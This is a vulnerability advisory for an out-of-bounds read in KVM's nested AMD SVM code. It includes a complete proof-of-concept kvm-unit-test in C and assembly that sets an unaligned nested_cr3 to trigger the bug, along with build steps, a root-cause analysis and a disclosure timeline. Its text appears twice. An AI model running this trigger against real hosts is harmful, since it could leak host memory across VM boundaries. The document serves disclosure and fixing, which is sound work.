Summary
A Out-Of-Bounds (OOB) read affecting KVM since v3.10 was discovered in arch/x86/kvm/svm/nested.c
. The memory read is from the user-space process managing the associated KVM based Virtual Machine (VM). The values passed from nested_svm_get_tdp_pdptr
are not masked to prevent the access from crossing a page boundary and __kvm_read_guest_page
lacks similar validation.
Severity
Moderate - The nested_svm_get_tdp_pdptr
function allows a guest Virtual Machine Monitor (VMM) to read memory OOB from its guest physical address (GPA) space. The data read is used to construct Nested Page Tables (NPT) and could be used to indirectly leak memory in the host virtual address (HVA) space.
QEMU was used to develop the PoC and results in __copy_from_user
returning an error and __kvm_read_guest_page
returning -EFAULT
. This is because QEMU adds a guard page directly before and after each region. Other products utilizing KVM could have different outcomes.
Proof-of-Concept
A kvm-unit-test
was developed to create a 32-bit protected mode nested-VMM with PAE enabled. It uses existing code from the project and switches a nested-VMM from 64-bit long mode to the require system state and back after executing the VMRUN instruction. This setup triggers the nested_svm_get_tdp_pdptr
execution path in KVM.
Modifying the vmcb->control.nested_cr3
value to a GPA at the edge of any memory slot will cause the OOB read access to take place. There are multiple locations that meet this criteria but change based on attached virtual devices and amount of memory.
Testing with QEMU resulted in a return value of -EFAULT
because it places guard pages at the start and end of every memory region exposed to the VM. Other applications leveraging KVM could have different results.
Build and Run with kvm-unit-test
- Copy
svm_p32pae_ncr3.c
and _svm_p32pae_ncr3.S
to the x86
directory
- Update
Makefile.x86_64
in the x86
directory to include the contents from the snippet below
- Run QEMU with
qemu-system-x86_64 -cpu host -m size=2048 -serial stdio -kernel svm_p32pae_ncr3.flat
// Makefile.x86_64
...
# add this line right before the "include $(SRCDIR)/$(TEST_DIR)/Makefile.common" line
tests += $(TEST_DIR)/svm_p32pae_ncr3.$(exe)
...
# add this line to the end of the file
$(TEST_DIR)/svm_p32pae_ncr3.$(bin): $(TEST_DIR)/svm_p32pae_ncr3.o $(TEST_DIR)/_svm_p32pae_ncr3.o
// svm_p32pae_ncr3.c
#include "x86/fwcfg.h"
#include "x86/msr.h"
#include "x86/processor.h"
#include "alloc_page.h"
#include "desc.h"
#include "vmalloc.h"
#include "x86/asm/page.h"
#include "alloc_phys.h"
#define SVM_EXIT_VMMCALL 0x081
#define SVM_EXIT_SHUTDOWN 0x07f
#define SVM_EXIT_NPF 0x400
#define MSR_BITMAP_SIZE 8192
#define TLB_CONTROL_FLUSH_ALL_ASID 1
#define SVM_SELECTOR_S_SHIFT 4
#define SVM_SELECTOR_P_SHIFT 7
#define SVM_SELECTOR_DB_SHIFT 10
#define SVM_SELECTOR_G_SHIFT 11
#define SVM_SELECTOR_S_MASK (1 << SVM_SELECTOR_S_SHIFT)
#define SVM_SELECTOR_P_MASK (1 << SVM_SELECTOR_P_SHIFT)
#define SVM_SELECTOR_DB_MASK (1 << SVM_SELECTOR_DB_SHIFT)
#define SVM_SELECTOR_G_MASK (1 << SVM_SELECTOR_G_SHIFT)
enum {
INTERCEPT_INTR,
INTERCEPT_NMI,
INTERCEPT_SMI,
INTERCEPT_INIT,
INTERCEPT_VINTR,
INTERCEPT_SELECTIVE_CR0,
INTERCEPT_STORE_IDTR,
INTERCEPT_STORE_GDTR,
INTERCEPT_STORE_LDTR,
INTERCEPT_STORE_TR,
INTERCEPT_LOAD_IDTR,
INTERCEPT_LOAD_GDTR,
INTERCEPT_LOAD_LDTR,
INTERCEPT_LOAD_TR,
INTERCEPT_RDTSC,
INTERCEPT_RDPMC,
INTERCEPT_PUSHF,
INTERCEPT_POPF,
INTERCEPT_CPUID,
INTERCEPT_RSM,
INTERCEPT_IRET,
INTERCEPT_INTn,
INTERCEPT_INVD,
INTERCEPT_PAUSE,
INTERCEPT_HLT,
INTERCEPT_INVLPG,
INTERCEPT_INVLPGA,
INTERCEPT_IOIO_PROT,
INTERCEPT_MSR_PROT,
INTERCEPT_TASK_SWITCH,
INTERCEPT_FERR_FREEZE,
INTERCEPT_SHUTDOWN,
INTERCEPT_VMRUN,
INTERCEPT_VMMCALL,
INTERCEPT_VMLOAD,
INTERCEPT_VMSAVE,
INTERCEPT_STGI,
INTERCEPT_CLGI,
INTERCEPT_SKINIT,
INTERCEPT_RDTSCP,
INTERCEPT_ICEBP,
INTERCEPT_WBINVD,
INTERCEPT_MONITOR,
INTERCEPT_MWAIT,
INTERCEPT_MWAIT_COND,
};
struct __attribute__((__packed__)) vmcb_seg {
u16 selector;
u16 attrib;
u32 limit;
u64 base;
};
struct __attribute__((__packed__)) vmcb_control_area {
u16 intercept_cr_read;
u16 intercept_cr_write;
u16 intercept_dr_read;
u16 intercept_dr_write;
u32 intercept_exceptions;
u64 intercept;
u8 reserved_1[42];
u16 pause_filter_count;
u64 iopm_base_pa;
u64 msrpm_base_pa;
u64 tsc_offset;
u32 asid;
u8 tlb_ctl;
u8 reserved_2[3];
u32 int_ctl;
u32 int_vector;
u32 int_state;
u8 reserved_3[4];
u32 exit_code;
u32 exit_code_hi;
u64 exit_info_1;
u64 exit_info_2;
u32 exit_int_info;
u32 exit_int_info_err;
u64 nested_ctl;
u8 reserved_4[16];
u32 event_inj;
u32 event_inj_err;
u64 nested_cr3;
u64 lbr_ctl;
u32 clean;
u32 reserved_5;
u64 next_rip;
u8 insn_len;
u8 insn_bytes[15];
u8 reserved_6[800];
};
struct __attribute__((__packed__)) vmcb_save_area {
struct vmcb_seg es;
struct vmcb_seg cs;
struct vmcb_seg ss;
struct vmcb_seg ds;
struct vmcb_seg fs;
struct vmcb_seg gs;
struct vmcb_seg gdtr;
struct vmcb_seg ldtr;
struct vmcb_seg idtr;
struct vmcb_seg tr;
u8 reserved_1[43];
u8 cpl;
u8 reserved_2[4];
u64 efer;
u8 reserved_3[112];
u64 cr4;
u64 cr3;
u64 cr0;
u64 dr7;
u64 dr6;
u64 rflags;
u64 rip;
u8 reserved_4[88];
u64 rsp;
u8 reserved_5[24];
u64 rax;
u64 star;
u64 lstar;
u64 cstar;
u64 sfmask;
u64 kernel_gs_base;
u64 sysenter_cs;
u64 sysenter_esp;
u64 sysenter_eip;
u64 cr2;
u8 reserved_6[32];
u64 g_pat;
u64 dbgctl;
u64 br_from;
u64 br_to;
u64 last_excp_from;
u64 last_excp_to;
};
struct __attribute__((__packed__)) vmcb {
struct vmcb_control_area control;
struct vmcb_save_area save;
};
struct regs {
u64 rax;
u64 rbx;
u64 rcx;
u64 rdx;
u64 cr2;
u64 rbp;
u64 rsi;
u64 rdi;
u64 r8;
u64 r9;
u64 r10;
u64 r11;
u64 r12;
u64 r13;
u64 r14;
u64 r15;
u64 rflags;
};
void svm_p32pae_ncr3_vm_main(void);
void svm_p32pae_ncr3_run_test(void);
struct regs regs;
struct vmcb *vmcb;
void *hsave;
u64 *pte[2048];
u64 *pde[4];
u64 *pdpe;
u8 *io_bitmap;
u8 io_bitmap_area[16384];
u8 *msr_bitmap;
u8 msr_bitmap_area[MSR_BITMAP_SIZE + PAGE_SIZE];
static void vmcb_set_seg(struct vmcb_seg *seg, u16 selector, u64 base,
u32 limit, u32 attr) {
seg->selector = selector;
seg->attrib = attr;
seg->limit = limit;
seg->base = base;
}
static void svm_p32pae_setup(void) {
struct vmcb_save_area *save = &vmcb->save;
struct vmcb_control_area *ctrl = &vmcb->control;
u64 *page, address;
struct descriptor_table_ptr desc_table_ptr;
int i, j;
printf("svm_p32pae_setup\n");
wrmsr(MSR_VM_HSAVE_PA, (u64)hsave);
wrmsr(MSR_EFER, rdmsr(MSR_EFER) | EFER_SVME);
io_bitmap = (void *)ALIGN((ulong)io_bitmap_area, PAGE_SIZE);
msr_bitmap = (void *)ALIGN((ulong)msr_bitmap_area, PAGE_SIZE);
u32 data_seg_attr = 3 | SVM_SELECTOR_S_MASK | SVM_SELECTOR_P_MASK |
SVM_SELECTOR_DB_MASK | SVM_SELECTOR_G_MASK;
u32 code_seg_attr = 9 | SVM_SELECTOR_S_MASK | SVM_SELECTOR_DB_MASK |
SVM_SELECTOR_P_MASK | SVM_SELECTOR_G_MASK;
memset(vmcb, 0, sizeof(*vmcb));
asm volatile("vmsave %0" : : "a"(vmcb) : "memory");
// setup ec, cs, ds, and ss segments for protected mode
vmcb_set_seg(&save->es, KERNEL_DS32, 0, -1U, data_seg_attr);
vmcb_set_seg(&save->cs, KERNEL_CS32, 0, -1U, code_seg_attr);
vmcb_set_seg(&save->ds, KERNEL_DS32, 0, -1U, data_seg_attr);
vmcb_set_seg(&save->ss, KERNEL_DS32, 0, -1U, data_seg_attr);
sgdt(&desc_table_ptr);
vmcb_set_seg(&save->gdtr, 0, desc_table_ptr.base, desc_table_ptr.limit, 0);
sidt(&desc_table_ptr);
vmcb_set_seg(&save->idtr, 0, desc_table_ptr.base, desc_table_ptr.limit, 0);
ctrl->asid = 1;
save->cpl = 0;
save->efer = rdmsr(MSR_EFER) &
~(_EFER_LME | _EFER_LMA); // disable long mode in the guest
save->cr4 = read_cr4();
save->cr0 = read_cr0() & ~X86_CR0_PG; // disable paging in the guest
save->dr7 = read_dr7();
save->dr6 = read_dr6();
save->cr2 = read_cr2();
save->g_pat = rdmsr(MSR_IA32_CR_PAT);
save->dbgctl = rdmsr(MSR_IA32_DEBUGCTLMSR);
ctrl->intercept = (1ULL << INTERCEPT_VMRUN) | (1ULL << INTERCEPT_VMMCALL);
ctrl->iopm_base_pa = (u64)io_bitmap;
ctrl->msrpm_base_pa = (u64)msr_bitmap;
address = 0;
/* PTE level */
for (i = 0; i < 2048; ++i) {
page = alloc_page();
for (j = 0; j < 512; ++j, address += 4096) page[j] = address | 0x067ULL;
pte[i] = page;
}
/* PDE level */
for (i = 0; i < 4; ++i) {
page = alloc_page();
for (j = 0; j < 512; ++j) page[j] = (u64)pte[(i * 512) + j] | 0x027ULL;
pde[i] = page;
}
/* PDPE level */
pdpe = alloc_page();
for (i = 0; i < 4; ++i) pdpe[i] = ((u64)(pde[i])) | 0x01ULL;
save->cr3 = (u64)pdpe;
ctrl->nested_ctl = 1;
ctrl->nested_cr3 = (u64)pdpe;
ctrl->tlb_ctl = TLB_CONTROL_FLUSH_ALL_ASID;
// clear the exit code and info fields
vmcb->control.exit_code = 0;
vmcb->control.exit_info_1 = 0;
vmcb->control.exit_info_2 = 0;
}
int main(int argc, char *argv[]) {
void *stack;
pteval_t opt_mask = 0;
printf("VM Started...\n");
__setup_vm(&opt_mask);
if (!this_cpu_has(X86_FEATURE_SVM)) {
printf("SVM not availble\n");
exit(-1);
}
if (!this_cpu_has(X86_FEATURE_NPT)) {
printf("NPT not availble\n");
exit(-1);
}
vmcb = alloc_page();
hsave = alloc_page();
svm_p32pae_setup();
stack = alloc_page();
vmcb->save.rsp = ((ulong)stack) + PAGE_SIZE;
vmcb->save.rip = (ulong)&svm_p32pae_ncr3_vm_main;
vmcb->save.rax = ~0ULL;
printf("svm_p32pae_ncr3_vm_main @ %p\n", &svm_p32pae_ncr3_vm_main);
// use the nested_cr3 page tables for the vmm page tables
// after the switch to protected mode
regs.rsi = vmcb->control.nested_cr3;
// set nested_cr3 to a gpa that would be at a boundary
// this value was obtained by running `info mtree` from the monitor cli
vmcb->control.nested_cr3 = 0x3fffffff;
svm_p32pae_ncr3_run_test();
printf("guest rip: 0x%lx\n", vmcb->save.rip);
printf("guest rax: 0x%lx\n", vmcb->save.rax);
switch (vmcb->control.exit_code) {
case SVM_EXIT_VMMCALL:
printf("exit_code == SVM_EXIT_VMMCALL\n");
break;
default:
printf("exit_code == %x\n", vmcb->control.exit_code);
break;
}
printf("VM Stopped...\n");
exit(0);
}
// _svm_p32pae_ncr3.S
.extern regs
.extern vmcb
xchg_gprs:
xchg %rbx, regs+0x8
xchg %rcx, regs+0x10
xchg %rdx, regs+0x18
xchg %rbp, regs+0x28
xchg %rsi, regs+0x30
xchg %rdi, regs+0x38
xchg %r8, regs+0x40
xchg %r9, regs+0x48
xchg %r10, regs+0x50
xchg %r11, regs+0x58
xchg %r12, regs+0x60
xchg %r13, regs+0x68
xchg %r14, regs+0x70
xchg %r15, regs+0x78
ret
switch_to_protected_pae_mode:
ljmp *1f
1:
.long 2f
.long 0x20 // KERNEL_CS32
.code32 // switch to 32-bit code
2:
push %eax
push %ecx
push %edx
movl %cr0, %eax
btcl $31, %eax /* clear PG */
movl %eax, %cr0
movl $0xc0000080, %ecx
rdmsr
btcl $8, %eax /* clear LME */
wrmsr
movl %cr3, %eax
movl %esi, %cr3 // restore cr3 from guest esi
movl %eax, %esi
movl %cr0, %eax
btsl $31, %eax /* set PG */
movl %eax, %cr0
ljmpl $0x20, $1f
1:
pop %edx
pop %ecx
pop %eax
ret
.code64 // restore 64-bit code mode
switch_to_long_mode:
.code32 //switch to 32-bit code
push %eax
push %ecx
push %edx
movl %cr0, %eax
btcl $31, %eax /* clear PG */
movl %eax, %cr0
movl %cr3, %eax
movl %esi, %cr3 // restore cr3 from guest esi
movl %eax, %esi
movl $0xc0000080, %ecx
rdmsr
btsl $8, %eax /* set LME */
wrmsr
movl %cr0, %eax
btsl $31, %eax /* set PG */
movl %eax, %cr0
pop %edx // this isn't correct per the amd manual
pop %ecx // but i guess the vm is okay with a few pops
pop %eax // before the switch to long mode
ljmp *1f
1:
.long 2f
.long 0x08 //KERNEL_CS64
.code64 // make this 64-bit code
2:
ret
.global svm_p32pae_ncr3_run_test
svm_p32pae_ncr3_run_test:
call xchg_gprs
call switch_to_protected_pae_mode
.code32
mov vmcb, %eax
vmload %eax
vmrun %eax
//.byte 0xeb, 0xfe
mov vmcb, %eax
vmsave %eax
call switch_to_long_mode
.code64
call xchg_gprs
ret
.global svm_p32pae_ncr3_vm_main
svm_p32pae_ncr3_vm_main:
.code32
mov $0x42424242, %eax
vmmcall
Further Analysis
A guest VMM leveraging AMD’s Secure Virtual Machine (SVM) extensions with NPT enabled could be used to access memory outside of its GPA space by specifying an unaligned NPT Control Register 3 (CR3) value in its Virtual Machine Control Block (VMCB). From protected mode with Physical Address Extension (PAE) enabled a guest VMM can set NP_ENABLE and populate the N_CR3 field in the VMCB with an unaligned GPA. In this configuration CR3 points to a Page Directory Pointer Table (PDPT) with 4 entries that are 8 bytes each. The VMCB is processed by KVM when the VMRUN
instruction is executed by the guest VMM.
KVM uses a function pointer in the kvm_mmu
structure named get_pdptr
to load a PDPT register. When a nested-VMM has SVM_NESTED_CTL_NP_ENABLE
in nested_ctl
that function pointer is set to nested_svm_get_tpd_pdptr
.
When nested_svm_tpd_pdptr
is called the nested_cr3
value in the svm->nested.ctl
structure contains the guest VMM controlled GPA of the PDPT and is loaded into the local u64 cr3
variable. It's then used to get the gfn_t gfn
with gpa_to_gfn(cr3)
and int offset
with offset_in_page(cr3) + index * 8
. These values are passed to kvm_vcpu_read_guest_page
.
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/kvm_host.h
static inline gfn_t gpa_to_gfn(gpa_t gpa)
{
return (gfn_t)(gpa >> PAGE_SHIFT);
}
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/mm.h
#define offset_in_page(p) ((unsigned long)(p) & ~PAGE_MASK)
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/arch/x86/kvm/svm/nested.c
static u64 nested_svm_get_tdp_pdptr(struct kvm_vcpu *vcpu, int index)
{
struct vcpu_svm *svm = to_svm(vcpu);
u64 cr3 = svm->nested.ctl.nested_cr3;
u64 pdpte;
int ret;
ret = kvm_vcpu_read_guest_page(vcpu, gpa_to_gfn(cr3), &pdpte,
offset_in_page(cr3) + index * 8, 8);
if (ret)
return 0;
return pdpte;
}
kvm_vcpu_read_guest_page
uses the gfn_t gfn
to get the kvm_memory_slot *slot
and calls __kvm_read_guest_page
. __kvm_read_guest_page
uses the gft_t gfn
passed to get a HVA using gfn_to_hva_memslot_prot
and then calls __copy_from_user
with address + offset
.
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/virt/kvm/kvm_main.c
int kvm_vcpu_read_guest_page(struct kvm_vcpu *vcpu, gfn_t gfn, void *data,
int offset, int len)
{
struct kvm_memory_slot *slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn);
return __kvm_read_guest_page(vcpu->kvm, slot, gfn, data, offset, len);
}
static int __kvm_read_guest_page(struct kvm_memory_slot *slot, gfn_t gfn,
void *data, int offset, int len)
{
int r;
unsigned long addr;
addr = gfn_to_hva_memslot_prot(slot, gfn, NULL);
if (kvm_is_error_hva(addr))
return -EFAULT;
r = __copy_from_user(data, (void __user *)addr + offset, len);
if (r)
return -EFAULT;
return 0;
}
CR3 in protected mode with PAE enabled only needs to be 32-byte aligned and KVM does not perform any alignment checking on the nested_cr3
value it can be set to any address in the GPA space.
It should be noted that "Volume 2: System Programming" of the "AMD64 Architecture Programmer’s Manual" does not identify any bits for the N_CR3 field as RESERVED, SBZ
or otherwise in "Appendix B VMCB Layout" as it does for other fields in Table B-1. Section 15.25.4 does describe nCR3 as, "the version of CR3 to be used while the nested-paging guest is running", and then states "Any MBZ bit of nCR3 is set" as an illegal state combination. Lastly, Figure 3-5 describes CR3 in "Legacy-Mode PAE Paging" as only using bits 31:5 for the address.
For example, if a guest VMM set N_CR3 in the VMCB to the last page of a memory slot with an offset of 0xfff
and executed VMRUN
the following would occur:
nested_svm_get_tdp_pdptr
would be called and use N_CR3 controlled by the guest VMM to compute the gfn
and offset
passed to kvm_vcpu_read_guest_page
gpa_to_gfn(cr3)
would pass the gfn
associated with the nested_cr3
value
offset_in_page(cr3) + index * 8
would pass 0xfff
, 0x1007
, 0x100f
, 0x1017
based on index
which can be 0 through 3
kvm_vcpu_read_guest_page
gets the slot
for the nested_cr3
gfn
and calls __kvm_read_guest_page
__kvm_read_guest_page
calls gfn_to_hva_memslot_prot
to get the HVA and checks it with kvm_is_error_hva
__copy_from_user
is called after adding addr + offset
which results in a read across the page boundary and outside of the memory slot previously checked
- If this read succeeded the value returned would be used by KVM as a
pdptr
and if it failed would return -EFAULT
nested_cr3
could be checked to ensure that it is 32-byte aligned but this bug identifies a larger issue with the underlying __kvm_read_guest_page
function. Specifically, if this function is meant to operate on a single page, as the name implies, it needs to ensure the entire access is within page bounds.
The addition of nested virtualization presents an indirect interface from a VM to KVM, through the VMCB for AMD CPUs, that wasn't wasn't previously controllable by a VM. Existing code that was updated to support this functionality needs should be reviewed further to esnure inputs are properly validated.
Timeline
Date reported: 08/27/2024
Date fixed: 11/05/2024
Date disclosed: 12/09/2024
Summary
A Out-Of-Bounds (OOB) read affecting KVM since v3.10 was discovered in
arch/x86/kvm/svm/nested.c
. The memory read is from the user-space process managing the associated KVM based Virtual Machine (VM). The values passed fromnested_svm_get_tdp_pdptr
are not masked to prevent the access from crossing a page boundary and__kvm_read_guest_page
lacks similar validation.Severity
Moderate - The
nested_svm_get_tdp_pdptr
function allows a guest Virtual Machine Monitor (VMM) to read memory OOB from its guest physical address (GPA) space. The data read is used to construct Nested Page Tables (NPT) and could be used to indirectly leak memory in the host virtual address (HVA) space.QEMU was used to develop the PoC and results in
__copy_from_user
returning an error and__kvm_read_guest_page
returning-EFAULT
. This is because QEMU adds a guard page directly before and after each region. Other products utilizing KVM could have different outcomes.Proof-of-Concept
A
kvm-unit-test
was developed to create a 32-bit protected mode nested-VMM with PAE enabled. It uses existing code from the project and switches a nested-VMM from 64-bit long mode to the require system state and back after executing the VMRUN instruction. This setup triggers thenested_svm_get_tdp_pdptr
execution path in KVM.Modifying the
vmcb->control.nested_cr3
value to a GPA at the edge of any memory slot will cause the OOB read access to take place. There are multiple locations that meet this criteria but change based on attached virtual devices and amount of memory.Testing with QEMU resulted in a return value of
-EFAULT
because it places guard pages at the start and end of every memory region exposed to the VM. Other applications leveraging KVM could have different results.Build and Run with kvm-unit-test
svm_p32pae_ncr3.c
and_svm_p32pae_ncr3.S
to thex86
directoryMakefile.x86_64
in thex86
directory to include the contents from the snippet belowqemu-system-x86_64 -cpu host -m size=2048 -serial stdio -kernel svm_p32pae_ncr3.flat
Further Analysis
A guest VMM leveraging AMD’s Secure Virtual Machine (SVM) extensions with NPT enabled could be used to access memory outside of its GPA space by specifying an unaligned NPT Control Register 3 (CR3) value in its Virtual Machine Control Block (VMCB). From protected mode with Physical Address Extension (PAE) enabled a guest VMM can set NP_ENABLE and populate the N_CR3 field in the VMCB with an unaligned GPA. In this configuration CR3 points to a Page Directory Pointer Table (PDPT) with 4 entries that are 8 bytes each. The VMCB is processed by KVM when the
VMRUN
instruction is executed by the guest VMM.KVM uses a function pointer in the
kvm_mmu
structure namedget_pdptr
to load a PDPT register. When a nested-VMM hasSVM_NESTED_CTL_NP_ENABLE
innested_ctl
that function pointer is set tonested_svm_get_tpd_pdptr
.When
nested_svm_tpd_pdptr
is called thenested_cr3
value in thesvm->nested.ctl
structure contains the guest VMM controlled GPA of the PDPT and is loaded into the localu64 cr3
variable. It's then used to get thegfn_t gfn
withgpa_to_gfn(cr3)
andint offset
withoffset_in_page(cr3) + index * 8
. These values are passed tokvm_vcpu_read_guest_page
.kvm_vcpu_read_guest_page
uses thegfn_t gfn
to get thekvm_memory_slot *slot
and calls__kvm_read_guest_page
.__kvm_read_guest_page
uses thegft_t gfn
passed to get a HVA usinggfn_to_hva_memslot_prot
and then calls__copy_from_user
withaddress + offset
.CR3 in protected mode with PAE enabled only needs to be 32-byte aligned and KVM does not perform any alignment checking on the
nested_cr3
value it can be set to any address in the GPA space.It should be noted that "Volume 2: System Programming" of the "AMD64 Architecture Programmer’s Manual" does not identify any bits for the N_CR3 field as
RESERVED, SBZ
or otherwise in "Appendix B VMCB Layout" as it does for other fields in Table B-1. Section 15.25.4 does describe nCR3 as, "the version of CR3 to be used while the nested-paging guest is running", and then states "Any MBZ bit of nCR3 is set" as an illegal state combination. Lastly, Figure 3-5 describes CR3 in "Legacy-Mode PAE Paging" as only using bits 31:5 for the address.For example, if a guest VMM set N_CR3 in the VMCB to the last page of a memory slot with an offset of
0xfff
and executedVMRUN
the following would occur:nested_svm_get_tdp_pdptr
would be called and use N_CR3 controlled by the guest VMM to compute thegfn
andoffset
passed tokvm_vcpu_read_guest_page
gpa_to_gfn(cr3)
would pass thegfn
associated with thenested_cr3
valueoffset_in_page(cr3) + index * 8
would pass0xfff
,0x1007
,0x100f
,0x1017
based onindex
which can be 0 through 3kvm_vcpu_read_guest_page
gets theslot
for thenested_cr3
gfn
and calls__kvm_read_guest_page
__kvm_read_guest_page
callsgfn_to_hva_memslot_prot
to get the HVA and checks it withkvm_is_error_hva
__copy_from_user
is called after addingaddr + offset
which results in a read across the page boundary and outside of the memory slot previously checkedpdptr
and if it failed would return-EFAULT
nested_cr3
could be checked to ensure that it is 32-byte aligned but this bug identifies a larger issue with the underlying__kvm_read_guest_page
function. Specifically, if this function is meant to operate on a single page, as the name implies, it needs to ensure the entire access is within page bounds.The addition of nested virtualization presents an indirect interface from a VM to KVM, through the VMCB for AMD CPUs, that wasn't wasn't previously controllable by a VM. Existing code that was updated to support this functionality needs should be reviewed further to esnure inputs are properly validated.
Timeline
Date reported: 08/27/2024
Date fixed: 11/05/2024
Date disclosed: 12/09/2024